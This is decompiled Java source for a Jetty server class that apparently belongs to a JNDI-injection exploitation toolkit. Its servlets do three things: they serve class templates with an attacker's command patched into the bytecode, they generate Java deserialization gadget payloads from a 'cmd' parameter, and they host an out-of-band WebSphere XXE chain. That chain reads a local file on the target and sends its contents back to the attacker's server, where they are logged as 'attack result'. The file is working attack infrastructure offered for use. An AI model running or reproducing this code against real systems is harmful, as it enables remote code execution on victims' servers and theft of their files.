/*
 * Decompiled with CFR 0.152.
 */
package jetty;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLEncoder;
import java.util.Base64;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import jndi.CommonDeserial;
import org.apache.commons.codec.binary.Hex;
import org.eclipse.jetty.server.Handler;
import org.eclipse.jetty.server.Server;
import org.eclipse.jetty.servlet.ServletHandler;
import run.ServerStart;
import util.Transformers;

public class JettyServer
implements Runnable {
    private int port;
    private Server server;
    private static URL codebase;
    private static String command;
    byte[] exportByteCode;
    byte[] exportJar;

    public JettyServer(int port, URL cb, String cmd) throws Exception {
        this.port = port;
        this.server = new Server(port);
        codebase = cb;
        command = cmd;
    }

    @Override
    public void run() {
        ServletHandler handler = new ServletHandler();
        this.server.setHandler((Handler)handler);
        handler.addServletWithMapping(DownloadServlet.class, "/*");
        handler.addServletWithMapping(WsdlServlet.class, "/wsdl/*");
        handler.addServletWithMapping(DeserialServlet.class, "/deserial/*");
        try {
            this.server.start();
            this.server.join();
        }
        catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static InputStream checkFilename(String filename) {
        String template;
        switch (filename) {
            case "ExecTemplateJDK6.class": {
                template = "template/ExecTemplateJDK6.class";
                break;
            }
            case "ExecTemplateJDK7.class": {
                template = "template/ExecTemplateJDK7.class";
                break;
            }
            case "ExecTemplateJDK8.class": {
                template = "template/ExecTemplateJDK8.class";
                break;
            }
            default: {
                return null;
            }
        }
        return Thread.currentThread().getContextClassLoader().getResourceAsStream(template);
    }

    public static class DeserialServlet
    extends HttpServlet {
        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            String outputParam;
            String wrapper = null;
            String output = "base64";
            String payloadGadget = request.getRequestURI().substring(10);
            String cmdParam = request.getParameter("cmd");
            if (cmdParam == null) {
                response.setStatus(500);
                ServletOutputStream out = response.getOutputStream();
                out.write("No param: cmd".getBytes());
                return;
            }
            String wrapperParam = request.getParameter("wrapper");
            if (wrapperParam != null && wrapperParam.length() > 0) {
                wrapper = wrapperParam;
            }
            if ((outputParam = request.getParameter("output")) != null && outputParam.length() > 0) {
                output = outputParam;
            }
            CommonDeserial commonDeserial = new CommonDeserial(cmdParam);
            byte[] deserialBytes = new byte[]{};
            try {
                deserialBytes = commonDeserial.execByDeserialize(payloadGadget, wrapper, false);
            }
            catch (Exception e) {
                e.printStackTrace();
            }
            if (deserialBytes.length == 0) {
                response.setStatus(500);
                ServletOutputStream out = response.getOutputStream();
                out.write("Error in Deserialization, Please use the correct payload name.".getBytes());
                return;
            }
            if (output.equals("base64")) {
                response.setStatus(200);
                ServletOutputStream out = response.getOutputStream();
                out.write(Base64.getEncoder().encodeToString(deserialBytes).getBytes());
            } else if (output.equals("hex")) {
                response.setStatus(200);
                ServletOutputStream out = response.getOutputStream();
                out.write(Hex.encodeHexString((byte[])deserialBytes).getBytes());
            } else {
                response.setStatus(500);
                ServletOutputStream out = response.getOutputStream();
                out.write("Error in param -O, you can only select base64 / hex".getBytes());
            }
        }
    }

    public static class WsdlServlet
    extends HttpServlet {
        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            String subpath = request.getRequestURI().substring(6);
            ServletOutputStream out = response.getOutputStream();
            switch (subpath) {
                case "list.wsdl": {
                    System.out.println(ServerStart.getLocalTime() + " [WebSphere XXE] attach list.wsdl");
                    String listWsdl = "<!DOCTYPE x [\n  <!ENTITY % aaa SYSTEM \"file://" + command + "\">\n  <!ENTITY % bbb SYSTEM \"" + codebase + "wsdl/xx.dtd\">\n  %bbb;\n]>\n<definitions name=\"HelloService\" xmlns=\"http://schemas.xmlsoap.org/wsdl/\">\n  &ddd;\n</definitions>";
                    response.setStatus(200);
                    out.write(listWsdl.getBytes());
                    break;
                }
                case "xx.dtd": {
                    System.out.println(ServerStart.getLocalTime() + " [WebSphere XXE] attach xx.dtd");
                    String xxhttp = "<!ENTITY % ccc '<!ENTITY ddd &#39;<import namespace=\"uri\" location=\"" + codebase + "wsdl/xxeLog?%aaa;\"/>&#39;>'>%ccc;";
                    response.setStatus(200);
                    out.write(xxhttp.getBytes());
                    break;
                }
                case "xxeLog": {
                    System.out.println(ServerStart.getLocalTime() + " [WebSphere XXE] attack result: " + request.getQueryString());
                    response.setStatus(200);
                    break;
                }
                default: {
                    response.setStatus(200);
                }
            }
        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            this.doGet(request, response);
        }
    }

    public static class DownloadServlet
    extends HttpServlet {
        public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            String filename = request.getRequestURI().substring(1);
            InputStream in = JettyServer.checkFilename(filename);
            ByteArrayInputStream bain = null;
            if (in != null) {
                try {
                    byte[] transformed = Transformers.insertCommand(in, command);
                    bain = new ByteArrayInputStream(transformed);
                }
                catch (Exception e) {
                    e.printStackTrace();
                    System.out.println(ServerStart.getLocalTime() + " [JETTYSERVER]>> Byte array build failed.");
                }
                System.out.println(ServerStart.getLocalTime() + " [JETTYSERVER]>> Log a request to " + request.getRequestURL());
                response.setStatus(200);
                response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(filename, "UTF-8"));
                byte[] buffer = new byte[1024];
                ServletOutputStream out = response.getOutputStream();
                if (bain != null) {
                    int len;
                    while ((len = bain.read(buffer)) > 0) {
                        out.write(buffer, 0, len);
                    }
                    bain.close();
                } else {
                    System.out.println(ServerStart.getLocalTime() + " [JETTYSERVER]>> Read file error!");
                }
            } else {
                System.out.println(ServerStart.getLocalTime() + " [JETTYSERVER]>> URL(" + request.getRequestURL() + ") Not Exist!");
            }
        }

        public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            this.doGet(request, response);
        }
    }
}

